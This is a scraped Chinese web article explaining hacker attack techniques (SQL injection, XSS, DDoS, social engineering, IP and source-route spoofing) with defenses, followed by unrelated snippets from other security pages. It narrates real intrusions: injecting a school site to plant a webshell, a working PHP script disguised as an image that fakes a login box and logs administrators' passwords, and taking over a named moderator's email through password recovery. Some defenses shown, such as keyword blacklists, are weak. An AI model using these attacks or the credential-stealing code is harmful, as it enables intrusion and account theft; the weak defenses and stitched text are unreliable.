来源:蜘蛛抓取(WebSpider)
时间:2018-06-08 16:31
标签:
为什么黑客不攻击腾讯
中国电子政务网--计算机安全--其他--黑客解密攻击方法&阐述如何防御攻击
黑客解密攻击方法&阐述如何防御攻击
来源:新华网 更新时间:
&随着网络与信息技术的飞速发展,尤其是在互连网飞速发展的今天,网络已经逐渐改变了人们的生活方式 ,成了生活中不可缺少的一部分。越来越多的企业已经开始建设自己的业务信息系统, 所以网络安全的重要性就此体现出来了。笔者在在中国被黑站点统计系统调查发现2007年 全国共有24516个一级域名网站被篡改,这仅仅还是以知的不包括所有的二级或二级域名以下的网站数据,其中包括:&&& .gov.cn 域名 的政府网站仅2007年就有 708 个网站被篡改&&& .cn 域名被黑站点统计 为 6186个&&& .com.cn 域名被黑站点统计 共计 1403 个&&& .com 域名& 被黑站点统计共计 13664 个&&& .net.cn 域名 被黑站点共计 203个&&& .net 域名 被黑站点统计共计 1586 个&&& .org 域名 被黑站点统计 共计393 个&&& .org.cn 域名 被黑站点统计 102 个&&& 教育网站被黑统计 .edu.cn 域名共271个被黑客所篡改,总计为 24516 个网站 。这些仅仅为我们所知道的。而更多的攻击是在隐蔽的 根本无法发觉的情况下进行。有的大型企业内部网络被黑客控制长达几个月 管理员竟然都不知道? &&& 那么黑客到底是如何攻击?他们心理又是如何去思考? 如何去确定一个攻击目标呢?从整体上看,网络攻击呈现下面两个特点:
&&& 一、黑客组织越来越正规化
&&& 组织内部有明确分工,从恶意代码的制作,到代码的散播,都有明确的分工合作。而不同的组织之间既有竞争也有合作,黑客攻击按照计划的有组织地进行,使得黑客攻击的效率有明显提高。
&&& 二、攻击目标直接化
&&& 网络黑客们针对攻击目标的特点,经过一系列的类似“睬点”后,黑客们针对目标存在的问题编写攻击代码 设定只针对此目标的攻击模式,绕过网络防御体系入侵有价值的目标主机,或者通过僵尸网络对目标发起直接的大规模网络攻击,造成目标网络不能访问或者访问延迟等等现象。
&&& 一般来说。真正的黑客不会去攻击没有价值的目标,往往是存在商业价值或者私人恩怨以后,“黑客”会确定目标进行跟踪式攻击,当然也不排除有无聊的非真正黑客进行无聊的攻击活动,当然这也从另一方面反映出我国的网络安全的薄弱现象。稍微懂一点计算机的“黑客”使用一些黑客工具就可以轻易的篡改一些网站。
&&& 那么下面我就针对网络黑客如何进行攻击与一些常用的攻击手法进行介绍,只有知道了如何攻击才能有效的进行防御。
&&& 2007年根据新近公布的一份现实威胁分析报告表明,Web 应用正成为最大的网络安全盲点。而企业必须认识到自己的各种应用的风险,并采取必要的手段来避免危险的安全攻击。有许多调查研究论及了病毒、网络攻击、公共缺陷公布、垃圾邮件和网络钓鱼企图,但很少关注位于防火墙和传统网络安全范畴之外的基于 Web 的应用。
&&& 简单来说,目前黑客攻击所用到的技术都是已知技术的更高级应用,大概分为以下的几种方法:&&& SQL注入 &&& 跨站攻击& &&& 拒绝服务攻击& &&& 社会工程学&
&接下来,我将简单介绍这几类攻击手法的技术原理。 以及该如何防范这些攻击。
&&& 注:以下例子都为真实的案例,为保护这些网站,网址经过处理。
&&& 一、SQL注入攻击
&&& 什么是 SQL注入呢?
&&& 简单的说也就是攻击者通过黑盒测试的方法查询到目标网站脚本存在过滤不严,那么攻击者就可以利用某些特殊构造的SQL语句插入SQL的特殊字符和指令,提交一段数据库查询代码,通过在IE浏览器访问直接查询管理员的用户口令等等。或者利用数据库的一些特性进行权限提升等等,这就是我们常说的sql injection也就是SQL注入。我们来看一下的代码:
&&& <%&&& dim ID&&& dim rs,sql &&& ID=request("id") //从客户端获取ID的值&&& sql = "select * from Info where ID="& ID& // 把查询语句赋值给SQL变量&&& Set rs = Server.CreateObject("ADODB.Recordset") //创建记录对象&&& rs.open sql,conn,1,1&&& //执行查询语句&&& if not (rs.eof and rs.bof) then& //判断记录是否存在&&& %>
&&& 如果程序员在网站的某一程序,比如vite.asp里有如上语句。那么我们可以清楚的看到ID没有经过任何过滤便放入到SQL查询语句当中,注入漏洞产生。那么我们可以构造地址为 的地址来进行SQL注射攻击。SQL注射为目前WEB应用的最重要的威胁。据了解,90%的企业网站被攻险都是因为SQL注入引起的。那么下面我们就来看真实的案例。
&&& 我看到最下面有版权所有:北京某专修学院网站 制作维护:中国万网的字样。原来是万网的程序。那么自己写的程序漏洞是不是会多一些呢?我们来测试一下吧。
首先先随便点开一个连接,地址为: hxxp://www.bjjxxx.com.cn/detail.asp?productid=389,我们在productid=389后面加一个单引号,看看返回什么呢?如图2
&&& 错误信息为: Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]第 1 行: '' 附近有语法错误。 /detail.asp,行 22
&&& 从上面的返回信息我们得到了以下几个提示:&&& 1.网站使用的是sql server数据库&&& 2.是通过odbc来连接数据库&&& 3.程序应该是有过滤不严密的地方,因为我们输入的单引号已经被程序解吸执行了。&&& 那么既然这样我们就可以使用 and 1=1 1=2来判断是不是存在注射漏洞。
&&& 通过判断发现该地址存在注射漏洞,马上使用工具检验一下,通过使用阿D注射工具发现,数据库当前库为cw88163_db,当前用户为cw88163,权限为DB_OWNER。如图3
既然知道了权限为DB_OWNER 那么我们就可以通过列目录来寻找网站的WEB目录 从而通过使用差异备份来获取网站的WEBSHELL。通过列取一系列目录得知 网站的WEB目录为D:\wwwroot\如图4
&&& 既然知道了WEB目录我们就使用NBSI的getwebshell功能备份一个一句话木马进去吧。在注入地址那里添写hxxp://www.bjjxxx.com.cn/detail.asp?productid=389,备份目录那里写D:\wwwroot\1.asp 然后点备份就好啦 可以看到我们成功的备份出了一个一句话木马。 如图5&
&&& 至此我们已经成功的拿到了网站的WEBSHELL也就是最高权限了。一个很简单的漏洞就使得一个名牌学校的网站就这样”沦陷”了。
&&& SQL注入防御方法:单独编写一个文件,部分内容为:&&& dim sql_injdata SQL_injdata = "'|and|exec|insert|select|delete|update|count|*|%|chr|mid|master|truncate|char|declare"&&&&&&&& SQL_inj = split(SQL_Injdata,"|")&&&& 也就是过滤掉了常用的SQL语句关键字,从而可以有效的防御SQL注射攻击。
&&& 读者也可以看看以下IT168 安全频道发过的文文章,
&&& [攻防手记]SQL Server注入大全及防御
&&& 注入漏洞之旁注攻击
&&& 顾名思义就是从旁注入,也就是利用主机上面的一个虚拟站点进行渗透此类手法多出现与虚拟主机站点。如一个网站本身程序非常安全,攻击者没有任何下手的地方,那么攻击者可以通过入侵同服务器的另外一个站点,然后提升权限从而达到入侵目标站的目的。防御方法:尽量选择单独服务器或者服务器权限设置比较好的虚拟机。
二、跨站攻击
&&& XSS又叫CSS(Cross Site Script) ,跨站脚本攻击。它指的是恶意攻击者向 Web面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码被执行,从而达到攻击者的特殊目的。XSS属于被动式的攻击,因为其被动且好利用,所以许多人经常忽略其危害性。
&&& 一般来说跨站最容易出现的地方在网站的留言版块.攻击者可以构造如 的语句。& 稍懂JS的人知道如果程序员在编写代码时没有过滤掉如</等等& 那么只要我们alert一个test直接就可以在IE里执行。&&&&& 传统的跨站利用方式一般都是攻击者首先构造一个网页,然后在攻击者的另一个空间里面放一个收集cookie的页面接着结合其他技术让用户打开跨站页面 以便盗取用户的cookie从而进行攻击。 如当攻击者要渗透一个站点,攻击者可能首先使简单的HTML 标签如(粗体),(斜体)或(下划线),或者他可能尝试简单的 script标签如 来检测,这样也是很容易检测出跨站漏洞。然而,高明点的攻击者可能用它的 hex 值替换整个字符串。这样也是可以的,然后点提交,
&&& 到了这里可能有些朋友觉得只是弹个窗,没什么了不起的,因而觉得这个没什么利用价值那可就大错特错了。其实我们还是可以利用这个XSS来偷取管理员的cookie,或者挂马!因为这站只是用trim过滤了空格,所以利用起来是非常容易的。 嘿嘿 下面我用这个漏洞来演示一下怎么偷到管理员的密码。 我们可以伪造个密码验证框!让管理输入帐号和密码验证,为了不让管理员发现,密码框的代码是利用cookie验证,密码框出现一次后,要想再出现密码框,就要在IE那删除cookie,如图8
为了不让管理员发现,我们用图片来伪装了。好了,那我们就来看看利用程序吧!代码如下:&&& ★&&& <?&&& header("Content-type: image/gif");&&& $image = imagecreatefromgif('mellow.gif');&&& if(!$_COOKIE['LOGON'])&&& {&&& $login = $_SERVER['PHP_AUTH_USER'];&&& $pass = $_SERVER['PHP_AUTH_PW'];&&& if(strlen($pass) <= 4 || !$login)&&& {&&& Header('HTTP/1.1 401 Unauthorized');&&& Header('WWW-Authenticate: Basic realm="管理员验证 - login"');&&& }&&& elseif($login)&&& {&&& setcookie('LOGON',md5($pass));&&& $f = fopen('passwords.txt', 'ab');&&& fwrite($f, $login." ||| ".$pass."\r\n");&&& fclose($f);&&& }&&& }&&& imagegif($image);&&& imagedestroy($image);&&& ?>&&& ★
&&& 新建个文档,把代码保存在文件内,后缀名改成图片格式。然后去网上找个小型的图片文件。将这两个图片放在同一个目录下就OK了。★$image = imagecreatefromgif('mellow.gif');★这里就是调用的正常图片文件!然后我们在跨站那里输入,如果成功的话,就会生成个passwords.txt文件,文件内记录着管理员输入的帐号和密码!废话不少说了,现在我们来演示下吧,可能有的人说?管理一般都在后台进行留言管理的。很少跑到前台的,其实后台也要调用那文件。只要管理员进了后台,进行留言管理就能利用的。另外不要搞错哦,那代码是PHP的,要在PHP环境下才能正常解析!如果大家没有PHP的空间,去找个支持PHP的Webshell也行。大家看到没,出现了登陆框,不精明的网管会以为是程序的验证。那么,他就会输入帐号和密码再次进行验证。刷新下,密码框就不会出现。除非你删除你机子上的cookie才行。这样迷域性更大了,
&看到了吧 我们成功的偷到管理员的密码了。怎么样?你会利用了么??
&&& 现在大家都知道怎样去利用XSS漏洞,那也应该要学习学习怎样去修补漏洞!有攻就有防嘛,呵呵!这里我简单说一下修补漏洞利用replace()函数就可以了。可能有些初学者不太了解replace()函数怎样去利用。例如这段程序,未修补的代码:&&& ★rs("title")=trim(request.form("title"))★&&& 修补后的代码:&&& ★Rs("title")=replace(trim(request.from("title")"<","//"))★
&&& 如果从客户端获取的title变量出现<就自动替换为//。那么测试语句就无法闭合了!当然还是可以转换为其它语句进行突破的,这只是演示怎样用replace函数简单的去过滤一些语句!我想,到这里大家也应该怎样去修补漏洞了吧!
&&& 笔者再说一下关于XSS的一点东西,可能有些朋友看完这篇文章以后会认为所有的跨站都是可以这么利用的。其实不然,有些跨站就真的只是能弹个窗口,但是他并不写入数据库。这样是没有任何意义的,我们来拿百度做实验,打开百度以后选择MP3然后点击音乐掌门人在搜索框内输入★★,成功弹出fish的框框&&&& 虽然成功的弹出了对话框,但是这个并不能算是真正意义上的跨站,因为他并没有写入数据库,除了能糊弄一些不懂的人之外,并没有任何的利用价值的。 所以在寻找跨站漏洞以及利用的过程中更多的是需要认真观察。寻找任何可利用的蛛丝马迹。
三、分布式拒绝服务攻击&&& 分布式拒绝服务攻击又称呼为DDOS攻击。DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的DoS攻击一般是采用一对一方式的,当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。随着计算机与网络技术的发展,计算机的处理能力迅速增长,内存大大增加,同时也出现了千兆级别的网络,这使得DoS攻击的困难程度加大了-目标对恶意攻击包的"消化能力"加强了不少,例如你的攻击软件每秒钟可以发送3,000个攻击包,但我的主机与网络带宽每秒钟可以处理10,000个攻击包,这样一来攻击就不会产生什么效果。
&&& 如果你理解了DoS攻击的话,它的原理就很简单。如果说计算机与网络的处理能力加大了10倍,用一台攻击机来攻击不再能起作用的话,攻击者使用10台攻击机同时攻击呢?用100台呢?DDoS就是利用更多的傀儡机来发起进攻,以比从前更大的规模来进攻受害者。而我们最常理解的含义为。 如果您的网站最高可以容纳5000人访问?
&&& 那么攻击者可以模拟出大概10万人来同时访问你的网站,那么这么多人同时访问势必会造成带宽被消耗导致CPU升高,从而达到瘫痪网站的目的然而 网络黑客不到万不得以的情况下不会使用DDOS等攻击方式, 因为虽然能最快速的达到目标网站瘫痪的目的,但是还是存在很多弊端。比如,每使用一次DDOS攻击,那么网络黑客就要损失10%-20%左右的肉鸡,另外这种攻击方式对黑客本身来说没有一点利益关系,因为你既得不到你想要的东西 又不能入侵他。所以DDOS攻击虽然是最“狠”的但也是最不长用的一种攻击方式。
&&& 因为没有办法做出事例,所以我找到了一些具体的图片供大家参考:&&& 如图:11.12.
&&&& 分布式拒绝服务攻击防御方法:目前来说没有好的方法防御,黑客跟“你”比的是带宽。&&& 建议:使用硬件防火墙 或者进行数据分流可以有效的防御DDOS攻击\
四、社会工程学
&&& 我们通常把基于非计算机的欺骗技术叫做社会工程。社会工程中,攻击者设法设计让人相信它是其他人。这就像攻击者在给人打电话时说自己是某人一样的简单。因为他说了一些大概只有那个人知道的信息,所以受害人相信他。 社会工程的核心是,攻击者设法伪装自己的身份并设计让受害人泄密私人信息。这些攻击的目标是搜集信息来侵入计算机系统的,通常通过欺骗某人使之泄露出口令或者在系统中建立个新帐号。
&&& 其他目标使侦察环境,找出安装了什么硬件和软件,服务器上装载了什么补丁等等。& 另外一般黑客在拿到同一个机房一台密码之后,会使用这个密码尝试登陆其他的机器,因为如果是同一个管理员的话那么他很有可能在他管理的服务器上都使用同一个密码。或者是通过破解一个管理员的油箱伪造他给另外的管理员发信息。
&&& 社会工程学实例:&&& 目标:hxxp://www.21xxx.net/bbs/index.asp 某个网论坛管理员。&&&& 通过观察得到这位斑竹的资料 如图15
&&& 通过了解得知 此版主的油箱为 生日为 ,如果我们了解163的油箱机制,我们就可以知道通过密码保护找回163油箱密码是需要生日的。所以我们在163油箱那里点击忘记密码,通过密码提示问题找回。要求我们输入生日 呵呵 我们在那里输入日,成功的进入第二步。
他的问题是MYNAME。那就是他的名字哦?可是我们不知道怎么办呢?不怕。我们知道万网有一个域名信息查询的功能,可以查询出注册域名的人的地址。名字等等,我们百度搜索,选择地址为http://www.123cha.com/domain/ 的查询功能,输入域名为21xxx.net,点查询,我们来看看反回的信息& 如图17
&&& 从信息中我们可以得知Registrant Organization ......... zhangqifeng 他的名字叫zhangqifeng,我们去试一下,如图18
&&& 看到没。我们已经成功的设置了他油箱的新密码 呵呵我们就可以通过登陆他的油箱来获取更多的信息了, 怎么样?社会工程学的强大能力领教了吧?
&&& 社会工程学防御方法:&&& 尽量在不同的地方使用不一样的密码,轻易不要相信陌生人所提供的资料。在互联网上尽量不要透漏自己过多的信息如家庭情况,手机号,生日等等。
&&& 总结:
&&& 这里我只列举出来了四个最常用也是成功率比较高的攻击方法,那么就国内网络安全现状来说。一般的网络管理员存在着最重要的误那就是管理员本身认为给服务器上一套设备。比如硬件防火墙 IDS、IPS等等就可以有效的阻止黑客攻击。其实不是这样的,工具是死的,人是活的。黑客在渗透过程中是靠着自己的智慧 与管理员斗的是经验。 任何一个工具都有他的弊端 工具不是每次都那么好用的。另外企业内部员工本身也存在着安全意识薄弱,对安全不够重视等等,所以企业内部员工对信息安全意识是非常重要的。
&&& 目前国内大部分网络安全公司都有开设对企业员工进行信息安全培训的科目,通过对企业内部员工进行简单评估来做出决定,以考虑需要进行哪些培训,如何进行培训等等。另外中小型企业规模往往比较小,不足以实行多种培训计划。要清楚中小企业的大部分电脑使用者并不是专业人员,相关的培训应该简单且接近企业用户的水平。 其次,需要考虑的是中小企业信息安全方面需要培训哪些内容。一般而言,需要考虑的培训内容包括:用户管理、网络与电子邮件、移动设备与便携设备使用、保密协议以及一些系统安全等 通过简单的培训使得企业员工有简单的安全意识就可以了。
&&& 随着越来越多的企业成立,越来越多的网站在互联网上开通,网络安全的重要性愈法的体现出来了。在这里我还是呼吁更多的人来关注网络安全!天极传媒:天极网全国分站
您现在的位置:
& &&黑客攻击手段揭秘及预防
黑客常用攻击手段揭秘及其预防措施天极安全 08:00
小编推荐更多关于黑客基础内容的文章:
目前造成网络不安全的主要因素是系统、协议及等的设计上存在缺陷。由于当今的网络在本身结构设计和代码设计时偏重考虑系统使用时的方便性,导致了系统在远程访问、权限控制和口令管理等许多方面存在安全漏洞。网络互连一般采用TCP/IP协议,它是一个工业标准的协议簇,但该协议簇在制订之初,对安全问题考虑不多,协议中有很多的安全漏洞。同样,数据库管理系统(DBMS)也存在数据的安全性、权限管理及远程访问等方面问题,在DBMS或应用程序中可以预先安置从事情报收集、受控激发、定时发作等破坏程序。
由此可见,针对系统、网络协议及数据库等,无论是其自身的设计缺陷,还是由于人为的因素产生的各种安全漏洞,都可能被一些另有图谋的黑客所利用并发起攻击。因此若要保证、可靠,则必须熟知黑客网络攻击的一般过程。只有这样方可在\客攻击前做好必要的防备,从而确保网络运行的安全和可靠。
一、黑客攻击网络的一般过程
1、信息的收集
信息的收集并不对目标产生危害,只是为进一步的入侵提供有用信息。黑客可能会利用下列的公开协议或工具,收集驻留在网络系统中的各个主机系统的相关信息:
(1)TraceRoute程序 能够用该程序获得到达目标主机所要经过的网络数和数。
(2)SNMP协议 用来查阅网络系统路由器的表,从而了解目标主机所在网络的拓扑结构及其内部细节。
(3)DNS 该服务器提供了系统中可以访问的主机IP地址表和它们所对应的主机名。
(4)Whois协议 该协议的服务信息能提供所有有关的DNS域和相关的管理参数。
(5)Ping实用程序 可以用来确定一个指定的主机的位置或网线是否连通。
2、系统安全弱点的探测
在收集到一些准备要攻击目标的信息后,黑客们会探测目标网络上的每台主机,来寻求系统内部的安全漏洞,主要探测的方式如下:
(1)自编程序 对某些系统,互联网上已发布了其安全漏洞所在,但用户由于不懂或一时疏忽未打上网上发布的该系统的“补丁”程序,那么\客就可以自己编写一段程序进入到该系统进行破坏。
(2)慢速扫描 由于一般扫描侦测器的实现是通过监视某个时间段里一台特定主机发起的连接的数目来决定是否在被扫描,这样黑客可以通过使用扫描速度慢一些的扫描软件进行扫描。
(3)体系结构探测 黑客利用一些特殊的数据包传送给目标主机,使其作出相对应的响应。由于每种操作系统的响应时间和方式都是不一样的,\客利用这种特征把得到的结果与准备好的数据库中的资料相对照,从中便可轻而易举地判断出目标主机操作系统所用的版本及相关信息。
二、协议欺骗攻击及其防范措施
1、源IP地址欺骗攻击
许多应用程序认为若数据包可以使其自身沿着路由到达目的地,并且应答包也可回到源地,那么源IP地址一定是有效的,而这正是使源IP地址欺骗攻击成为可能的一个重要前提。
假设同一网段内有两台主机和B,另一网段内有主机X。B 授予A某些特权。X 为获得与A相同的特权,所做欺骗攻击如下:首先,X冒充A,向主机 B发送一个带有随机序列号的SYN包。主机B响应,回送一个应答包给A,该应答号等于原序列号加1。然而,此时主机A已被主机X利用拒绝服务攻击 “淹没”了,导致主机A服务失效。结果,主机A将B发来的包丢弃。为了完成三次握手,X还需要向B回送一个应答包,其应答号等于B向A发送数据包的序列号加1。此时主机X 并不能检测到主机B的数据包(因为不在同一网段),只有利用TCP顺序号估算法来预测应答包的顺序号并将其发送给目标机B。如果猜测正确,B则认为收到的ACK是来自内部主机A。此时,X即获得了主机A在主机B上所享有的特权,并开始对这些服务实施攻击。
要防止源IP地址欺骗行为,可以采取以下措施来尽可能地保护系统免受这类攻击:
(1)抛弃基于地址的信任策略 阻止这类攻击的一种十分容易的办法就是放弃以地址为基础的验证。不允许r类远程调用命令的使用;删除.清空/etc/hosts.equiv 文件。这将迫使所有用户使用其它远程通信手段,如telnet、ssh、skey等等。
(2)使用加密方法 在包发送到 网络上之前,我们可以对它进行加密。虽然加密过程要求适当改变目前的网络环境,但它将保证数据的完整性、真实性和保密性。
(3)进行包过滤 可以配置路由器使其能够拒绝网络外部与本网内具有相同IP地址的连接请求。而且,当包的IP地址不在本网内时,路由器不应该把本网主机的包发送出去。有一点要注意,路由器虽然可以封锁试图到达内部网络的特定类型的包。但它们也是通过分析源地址来实现操作的。因此,它们仅能对声称是来自于内部网络的外来包进行过滤,若你的网络存在外部可信任主机,那么路由器将无法防止别人冒充这些主机进行IP欺骗。
2、源路由欺骗攻击
在通常情况下,信息包从起点到终点所走的路是由位于此两点间的路由器决定的,数据包本身只知道去往何处,而不知道该如何去。源路由可使信息包的发送者将此数据包要经过的路径写在数据包里,使数据包循着一个对方不可预料的路径到达目的主机。下面仍以上述源IP欺骗中的例子给出这种攻击的形式:
主机A享有主机B的某些特权,主机X想冒充主机A从主机B(假设IP为aaa.bbb.ccc.ddd)获得某些服务。首先,攻击者修改距离X最近的路由器,使得到达此路由器且包含目的地址aaa.bbb.ccc.ddd的数据包以主机X所在的网络为目的地;然后,攻击者X利用IP欺骗向主机B发送源路由(指定最近的路由器)数据包。当B回送数据包时,就传送到被更改过的路由器。这就使一个入侵者可以假冒一个主机的名义通过一个特殊的路径来获得某些被保护数据。
为了防范源路由欺骗攻击,一般采用下面两种措施:
? 对付这种攻击最好的办法是配置好路由器,使它抛弃那些由外部网进来的却声称是内部主机的报文。
? 在路由器上关闭源路由。用命令no ip source-route。
(作者:五月 整理责任编辑:卢林嘉)
天极新媒体&最酷科技资讯扫码赢大奖
* 网友发言均非本站立场,本站不在评论栏推荐任何网店、经销商,谨防上当受骗!
Win10系统在Win8的基础上对界面、特性以及跨平台方面做了诸多优化。
手机整机DIY企业级
pc软件手机软件& 相关文章 &
作者:cnqing //本文以发表于20083期黑客防线 版权归《黑客防线》杂志社所有 //转载请表明版权 ARP欺骗的攻击和防御技术都比较成熟了,这里也不再阐述。此次重点讲解如何不用ARP欺骗进行嗅探以及会话劫持的技术原理,实际的攻击方法是进行MAC欺骗。 一、原理: 在开始之前我们先简单了解一下交换机转发过程:交换机的一个端口收到一个数据帧时,首先检查改数据帧的目的MAC地址在MAC地址表(CAM)对应的端口,如果目的端口与源端口不为同一个端口,则把帧从目的端口转发出去,同时更新MAC地址
流量劫持(下):流量劫持有多大危害
数据,又有程序的界面和代码,劫持简直轻而易举。 上一篇也提到,如果在户外没有 3G 信号的地方钓鱼,无法将获得的流量转发到外网。然而,使用网页这一切就迎刃而解。我们完全可以在自己的设备上搭建一个站点,留住用户发起离线攻击。对于那些连上 WiFi 能自动弹网页的设备,那就更容易入侵了。 因此,劫持网页流量成了各路黑客们的钟爱,一种可在任意网页发起 XSS 的入侵方式。 下面,开始我们的攻防之旅。 只浏览不登陆就没事吗? 每当砖家出来提醒时,总免不了这么一句:公共场合尽量不登录账号。于是,大家就认为
流量劫持能有多大危害?
数据,又有程序的界面和代码,劫持简直轻而易举。 上一篇也提到,如果在户外没有 3G 信号的地方钓鱼,无法将获得的流量转发到外网。然而,使用网页这一切就迎刃而解。我们完全可以在自己的设备上搭建一个站点,留住用户发起离线攻击。对于那些连上 WiFi 能自动弹网页的设备,那就更容易入侵了。 因此,劫持网页流量成了各路黑客们的钟爱,一种可在任意网页发起 XSS 的入侵方式。 下面,开始我们的攻防之旅。 只浏览不登陆就没事吗? 每当砖家出来提醒时,总免不了这么一句:公共场合尽量不登录账号。于是,大家就认为
和防护,文件数据加密和解密等,课程安排策划在60节课程左右,实际录制过程中,会根据实际录制需要调整课程录制的顺序或者增加删除一些内容,但总体课程内容不会发生太大的变化,以下是课程的安排目录: 课程大纲如下: 1.黑客必修DOS命令详解--黑色窗口下的速杀命令(上) 2.黑客必修DOS命令详解--黑色窗口下的速杀命令(下) 3.CHM电子书木马制作全攻略--隐藏在电子书中的臭虫 4.入侵前的准备--网络信息踩点的介绍 5.网络钓鱼攻击与防范--让你远离网络陷阱 6.钓鱼网站的实例搭建和演示 7.隐藏
ARP欺骗与攻击原理
ARP欺骗技术是黑客攻击基于以太与IP网络的常见手段,本文将全面解释什么是ARP攻 击,ARP欺骗发生以后可以利用的几种黑客攻击手段。如何防范ARP欺骗发生。
一:什么是ARP,为什么ARP欺骗会发生 ARP是地址解析协议(AddressResolution protocol)的简称,首先看一下TCP/IP网络的开放系统 互联协议分层结构: 七层分别为物理层,数据链路层,网络层,传输层,会话层,表示层,应用层。 对于任何一台在网络上的计算机来说,都有两个网络地址,一个是基于网卡的MAC地址
设计阶段要充分考虑安全的问题,并且及时更新程序中的缺陷与安全漏洞;作为用户要及时的更新应用程序或者系统补丁,从而减少安全威胁。 目前最为常见的手段仍然是SSL劫持攻击,但无论是什么攻击手段,基础的利用都是局域网的中间人攻击,这种攻击手段非常的实用,尤其是在公共网络中。针对SSL的中间人攻击对普通用户来说或许还好识别一些,但是我们大多数情况访问的都是HTTP网站,传输的数据都是明文的,在这种情况下中间人攻击是不容易被发现的。对于普通用户,可以用以下的办法来防御局域网中间人攻击: 公司办公网络一定
HTTPS那些事(三)攻击实例与防御
设计阶段要充分考虑安全的问题,并且及时更新程序中的缺陷与安全漏洞;作为用户要及时的更新应用程序或者系统补丁,从而减少安全威胁。 目前最为常见的手段仍然是SSL劫持攻击,但无论是什么攻击手段,基础的利用都是局域网的中间人攻击,这种攻击手段非常的实用,尤其是在公共网络中。针对SSL的中间人攻击对普通用户来说或许还好识别一些,但是我们大多数情况访问的都是HTTP网站,传输的数据都是明文的,在这种情况下中间人攻击是不容易被发现的。对于普通用户,可以用以下的办法来防御局域网中间人攻击: 公司办公网络一定
不支持https方式访问,我们只能通过加密代理、VPN或利用系统的漏洞进行访问了。而且国内的系统对付https也不是没有其他手段了。除了IP封锁外,还有无状态的TCP连接重置、SSL证书过滤、SSL劫持等手段,下面进行依次介绍。
6、无状态的TCP连接重置 由于https是加密传输数据的协议,系统无法知道通过https协议传输了什么内容,但又不允许民众使用https访问“有害信息”,所以系统只要监测到(系统只是知道访问了这个网站的https协议,并不知道其中传输的内容)访问了指定网站
流量劫持是如何产生的?
,就能高枕无忧了吗?事实上有问题的设备并不多,但出问题的事却不少,难道其中还存在什么缺陷?没错,还遗漏了最重要的一点:网络环境。 如果网络环境里有黑客潜伏着,即使有足够专业的技术,是在所难逃了,敌暗我明,稍不留神就会落入圈套。 当然,苍蝇不叮无缝的蛋。有哪些隐患导致你的网络环境出现了裂缝?太多了,从古到今流行过的攻击方式数不胜数。甚至可以根据实际环境,自己创造一种。 现在回忆下尝试过的劫持案例。 上古时代: Hub 嗅探 MAC 欺骗 MAC 冲刷 ARP 攻击 DHCP 钓鱼 DNS 劫持 CDN
流量劫持是如何产生的
量劫持,这种古老的攻击沉寂了一段时间后,最近又开始闹的沸沸扬扬。 众多知名品牌的路由器相继爆出存在安全漏洞,引来国内媒体纷纷报道。只要用户没改默认密码,打开一个网页甚至帖子,路由器配置就会被暗中修改。互联网一夜间变得岌岌可危。 攻击还是那几种攻击,报道仍是那千篇一律的砖家提醒,以至于大家都麻木了。早已见惯运营商的各种劫持,频繁的广告弹窗,大家也无可奈何。这么多年也没出现过什么损失,也就睁只眼闭只眼。 事实上,仅仅被运营商劫持算是比较幸运了。相比隐匿在暗中的神秘黑客,运营商作为公众企业还是得守法
流量劫持(上):流量劫持是如何产生的
流量劫持,这种古老的攻击沉寂了一段时间后,最近又开始闹的沸沸扬扬。众多知名品牌的路由器相继爆出存在安全漏洞,引来国内媒体纷纷报道。只要用户没改默认密码,打开一个网页甚至帖子,路由器配置就会被暗中修改。互联网一夜间变得岌岌可危。
攻击还是那几种攻击,报道仍是那千篇一律的砖家提醒,以至于大家都麻木了。早已见惯运营商的各种劫持,频繁的广告弹窗,大家也无可奈何。这么多年也没出现过什么损失,也就睁只眼闭只眼。
事实上,仅仅被运营商劫持算是比较幸运了。相比隐匿
什么是网络流量劫持?揭秘详解黑客劫持的攻击手段与防御方法 (一)
流量劫持,这种古老的攻击沉寂了一段时间后,最近又开始闹的沸沸扬扬。众多知名品牌的路由器相继爆出存在安全漏洞,引来国内媒体纷纷报道。只要用户没改默认密码,打开一个网页甚至帖子,路由器配置就会被暗中修改。互联网一夜间变得岌岌可危。 攻击还是那几种攻击,报道仍是那千篇一律的砖家提醒,以至于大家都麻木了。早已见惯运营商的各种劫持,频繁的广告弹窗,大家也无可奈何。这么多年也没出现过什么损失,也就睁只眼闭只眼。 事实上,仅仅被运营商劫持算是比较幸运了。相比隐匿在暗中的神秘黑客,运营商作为公众企业还是得守法
一篇总结很齐全的关于流量劫持和嗅探的文章
。这么多年也没出现过什么损失,也就睁只眼闭只眼。
事实上,仅仅被运营商劫持算是比较幸运了。相比隐匿在暗中的神秘黑客,运营商作为公众企业还是得守法的,广告劫持虽无节操但还是有底线的。这不,能让你看见广告了,也算是在提醒你,当前网络存在被劫持的风险,得留点神;相反,一切看似风平浪静毫无异常,或许已有一个天大的间谍潜伏在网络里,随时等你上钩 —— 这可不是弹广告那样简单,而是要谋财盗号了! 我会被劫持吗?
不少人存在这样的观点:只有那些安全意识薄弱的才会被入侵。只要装了各种
DNS 攻击方式及攻击案例
【赛迪网-IT技术报道】日晨7时起,网络上开始陆续出现百度出现无法访问的情况反馈, 12时左右基本恢复正常;18时许百度发布官方版本公告;对事故原因说明为:“因www.baidu.com的域名在美国域名注册商处被非法篡改,导致全球多处用户不能正常访问百度。”黑客所使用的方式就是DNS劫持,那么什么叫DNS,什么又是DNS劫持呢,下面我们就来一一解析。 什么是DNS呢? 网络节点能够被寻址访问的原因,是由于网络节点拥有一个独立身份证,这是由网卡物理地址、IP地址和网络端口组成
DNS 攻击方式及攻击案例
【赛迪网-IT技术报道】日晨7时起,网络上开始陆续出现百度出现无法访问的情况反馈, 12时左右基本恢复正常;18时许百度发布官方版本公告;对事故原因说明为:“因www.baidu.com的域名在美国域名注册商处被非法篡改,导致全球多处用户不能正常访问百度。”黑客所使用的方式就是DNS劫持,那么什么叫DNS,什么又是DNS劫持呢,下面我们就来一一解析。 什么是DNS呢? 网络节点能够被寻址访问的原因,是由于网络节点拥有一个独立身份证,这是由网卡物理地址、IP地址和网络端口组成
的资料都有,Rockey2.dll居然没加壳,这点我很惊讶,也很庆幸,本人菜鸟,不会脱壳……
